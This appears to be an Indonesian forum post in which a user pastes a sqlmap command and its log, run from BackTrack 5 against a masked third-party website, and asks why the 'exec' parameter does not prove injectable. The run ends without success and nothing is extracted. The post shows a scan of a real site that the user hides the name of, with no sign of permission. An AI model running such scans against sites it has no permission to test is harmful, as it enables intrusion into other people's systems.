tentang SQL INJECTION
#1
Question 
iam use BACKTRACK 5


root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://www.xxxxxx.com/index.php?exec=./about/hehehe --dbs

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:00:42

[17:00:43] [INFO] using '/pentest/web/scanners/sqlmap/output/xxxxxx.com/session' as session file
[17:00:43] [INFO] testing connection to the target url
[17:00:48] [INFO] testing if the url is stable, wait a few seconds
[17:00:54] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [©ontinue/(s)tring/®egex/(q)uit] c
[17:01:05] [INFO] testing if GET parameter 'exec' is dynamic
[17:01:07] [INFO] confirming that GET parameter 'exec' is dynamic
[17:01:08] [INFO] GET parameter 'exec' is dynamic
[17:01:10] [WARNING] heuristic test shows that GET parameter 'exec' might not be injectable
[17:01:10] [INFO] testing sql injection on GET parameter 'exec'
[17:01:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:01:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:01:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[17:01:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
^C[17:01:41] [WARNING] user aborted during detection phase
How do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] q
[17:01:44] [ERROR] user quit

[*] shutting down at: 17:01:44


tadi habis nyoba2 sql injection, eh malah down, ga kerasa dah 3 jam fokus bljar sql, tp blm mnemukan hasil...

(situs target saya samarkan jadi xxxxxx bro, ntar bahaya donk SmileSmileSmile dikirain mau ngacak2, pdahalkan cuma mau test doang SmileSmile)

gini bro, saya rasa permasalahan di atas terletak di bagian "exec", bner ga? ( sotoy gw nih )
soalnya, saya ikuti tutorial ga ada "exec", adanya "id" contohnya gini bro : "http:www.fbi.com/hacker.php?id=12"

mohon bantuannya bro tentang permasalahan ini,..
atas bntuannya, mksih buaaanget yaa....
salam backtracker...Big Grin Big Grin






Users browsing this thread: 1 Guest(s)